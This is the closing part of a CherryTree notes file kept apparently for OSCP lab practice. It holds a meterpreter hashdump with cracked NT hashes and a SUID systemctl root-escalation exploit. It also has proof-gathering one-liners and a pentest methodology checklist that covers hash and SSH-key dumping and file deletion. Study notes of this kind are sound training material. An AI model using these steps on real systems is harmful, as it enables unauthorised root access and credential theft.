Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:04 DONE (2020-05-27 14:54) 0.4889g/s 2493Kp/s 2493Kc/s 2495KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the &quot;--show --format=NT&quot; options to display all of the cracked passwords reliably
Session completed

</rich_text>
				</node>
			</node>
			<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes: John" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590603834.28" ts_lastsave="1590603848.08" unique_id="93">
				<rich_text>meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::


sudo john --format=NT --rules --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:04 DONE (2020-05-27 14:54) 0.4889g/s 2493Kp/s 2493Kc/s 2495KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the &quot;--show --format=NT&quot; options to display all of the cracked passwords reliably
Session completed

</rich_text>
			</node>
			<node custom_icon_id="10" foreground="" is_bold="False" name="Priv Escalation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590161378.81" unique_id="63">
				<rich_text weight="heavy">Service Exploited:  
Vulnerability Type:
Exploit POC:</rich_text>
				<rich_text>
</rich_text>
				<rich_text weight="heavy">Description</rich_text>
				<rich_text>: 

</rich_text>
				<rich_text underline="single" weight="heavy">Discovery of Vulnerability</rich_text>
				<rich_text>
search for all SUID bits set:
SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

find . -perm /4000 2&gt;/dev/null
/bin/systemctl stood out

</rich_text>
				<rich_text link="webs https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49">https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49</rich_text>
				<rich_text>
*renamed to phtml to upload


Upgrade to PTY shell:
python -c ‘import.pty: pty.spawn(&quot;/bin/bash&quot;)’

</rich_text>
				<rich_text underline="single" weight="heavy">Exploit Code Used</rich_text>
				<rich_text>
priv=$(mktemp).service

echo '[Service]
&gt;ExecStart=/bin/bash -c “cat /root/root.txt &gt; /opt/flag”
&gt;[Install]
&gt;WantedBy=multi-user.target' &gt; $priv

#run the unit file using systemctl
/bin/systemctl link $priv
/bin/systemctl enable --now $priv

excuted as root
cat /opt/flag




</rich_text>
				<rich_text underline="single" weight="heavy">Proof\Local.txt File</rich_text>
				<rich_text>

   ☐ Screenshot with ifconfig\ipconfig
   ☐ Submit too OSCP Exam Panel

</rich_text>
			</node>
			<node custom_icon_id="43" foreground="" is_bold="False" name="Goodies" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949508.15" unique_id="64">
				<rich_text></rich_text>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Hashes" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949998.88" unique_id="65">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Passwords" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492950150.97" unique_id="66">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Proof\Flags\Other" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1587583059.94" unique_id="67">
					<rich_text scale="h1">Linux</rich_text>
					<rich_text>
</rich_text>
					<rich_text justification="left"></rich_text>
					<rich_text>

</rich_text>
					<rich_text scale="h1">Windows</rich_text>
					<rich_text>
</rich_text>
					<rich_text justification="left"></rich_text>
					<codebox char_offset="6" frame_height="140" frame_width="765" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">echo &quot; &quot;;echo &quot;uname -a:&quot;;uname -a;echo &quot; &quot;;echo &quot;hostname:&quot;;hostname;echo &quot; &quot;;echo &quot;id&quot;;id;echo &quot; &quot;;echo &quot;ifconfig:&quot;;/sbin/ifconfig -a;echo &quot; &quot;;echo &quot;proof:&quot;;cat /root/proof.txt 2&gt;/dev/null; cat /Desktop/proof.txt 2&gt;/dev/null;echo &quot; &quot; 

echo &quot; &quot;;echo &quot;uname -a:&quot;;uname -a;echo &quot; &quot;;echo &quot;hostname:&quot;;hostname;echo &quot; &quot;;echo &quot;id&quot;;id;echo &quot; &quot;;echo &quot;ip address:&quot;;ip address;echo &quot; &quot;;echo &quot;proof:&quot;;cat /root/proof.txt 2&gt;/dev/null; cat ./local.txt 2&gt;/dev/null;echo &quot; &quot;</codebox>
					<codebox char_offset="17" frame_height="230" frame_width="785" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="dosbatch" width_in_pixels="True">echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Documents and Settings\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\Desktop\proof.txt 2&gt; nul

echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\admin\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Documents and Settings\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\Desktop\proof.txt 2&gt; nul

#french
echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Docume~1\Admini~1\Bureau\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\bureau\proof.txt 2&gt; nul</codebox>
				</node>
			</node>
			<node custom_icon_id="12" foreground="" is_bold="False" name="Software Versions" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1496953122.23" unique_id="68">
				<rich_text underline="single" weight="heavy">Software Versions
</rich_text>
				<rich_text>





</rich_text>
				<rich_text underline="single" weight="heavy">Potential Exploits</rich_text>
			</node>
			<node custom_icon_id="13" foreground="" is_bold="True" name="Methodology" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1496953072.48" ts_lastsave="1500474082.49" unique_id="69">
				<rich_text underline="single" weight="heavy">Network Scanning</rich_text>
				<rich_text>

   ☐  nmap -sn 10.11.1.*
   ☐  nmap -sL 10.11.1.*
   ☐  nbtscan -r 10.11.1.0/24
   ☐  </rich_text>
				<rich_text link="node 70">smbtree</rich_text>
				<rich_text>

</rich_text>
				<rich_text underline="single" weight="heavy">Individual Host Scanning</rich_text>
				<rich_text>

   ☐  nmap  --top-ports 20 --open -iL iplist.txt
   ☐  nmap -sS -A -sV -O -p- ipaddress
   ☐  nmap -sU ipaddress

</rich_text>
				<rich_text underline="single" weight="heavy">Service Scanning</rich_text>
				<rich_text>

    </rich_text>
				<rich_text weight="heavy">WebApp</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 69">Nikto</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 52">dirb</rich_text>
				<rich_text>
      ☐   dirbuster
      ☐   </rich_text>
				<rich_text link="node 71">wpscan</rich_text>
				<rich_text>
      ☐   dotdotpwn
      ☐   view source 
      ☐   davtest\cadevar
      ☐   droopscan
      ☐   joomscan
      ☐   LFI\RFI Test
      
    </rich_text>
				<rich_text weight="heavy">Linux\Windows</rich_text>
				<rich_text>
      ☐   snmpwalk -c public -v1 </rich_text>
				<rich_text style="italic">ipaddress</rich_text>
				<rich_text> 1
      ☐   smbclient -L //ipaddress
      ☐   showmount -e ipaddress port
      ☐   rpcinfo
      ☐   Enum4Linux
    
    </rich_text>
				<rich_text weight="heavy">Anything Else</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 72">nmap scripts</rich_text>
				<rich_text> (locate *nse* | grep servicename)
      ☐   </rich_text>
				<rich_text link="node 73">hydra</rich_text>
				<rich_text>
      ☐   MSF Aux Modules
      ☐   Download the softward

</rich_text>
				<rich_text underline="single" weight="heavy">Exploitation</rich_text>
				<rich_text>
   ☐   Gather Version Numbes
   ☐   Searchsploit
   ☐   Default Creds
   ☐   Creds Previously Gathered
   ☐   Download the software

</rich_text>
				<rich_text underline="single" weight="heavy">Post Exploitation</rich_text>
				<rich_text>

    </rich_text>
				<rich_text weight="heavy">Linux</rich_text>
				<rich_text>
      ☐   linux-local-enum.sh
      ☐   linuxprivchecker.py
      ☐   linux-exploit-suggestor.sh
      ☐   unix-privesc-check.py

    </rich_text>
				<rich_text weight="heavy">Windows</rich_text>
				<rich_text>
      ☐   wpc.exe
      ☐   windows-exploit-suggestor.py
      ☐   </rich_text>
				<rich_text link="webs https://github.com/pentestmonkey/windows-privesc-check/blob/master/windows_privesc_check.py">windows_privesc_check.py</rich_text>
				<rich_text>
      ☐  	windows-privesc-check2.exe

</rich_text>
				<rich_text underline="single" weight="heavy">Priv Escalation</rich_text>
				<rich_text>
   ☐  </rich_text>
				<rich_text link="node 74">acesss internal services (portfwd)</rich_text>
				<rich_text>
   ☐  add account

</rich_text>
				<rich_text weight="heavy">Windows</rich_text>
				<rich_text>
   ☐  List of exploits

</rich_text>
				<rich_text weight="heavy">Linux</rich_text>
				<rich_text>
   ☐  sudo su 
   ☐  KernelDB
   ☐  Searchsploit

</rich_text>
				<rich_text underline="single" weight="heavy">Final</rich_text>
				<rich_text>
   ☐  Screenshot of IPConfig\WhoamI
   ☐  Copy proof.txt
   ☐  Dump hashes 
   ☐  Dump SSH Keys
   ☐  Delete files</rich_text>
			</node>
			<node custom_icon_id="20" foreground="" is_bold="True" name="Log Book" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714168.37" unique_id="75">
				<rich_text></rich_text>
			</node>
		</node>
	</node>
</cherrytree>
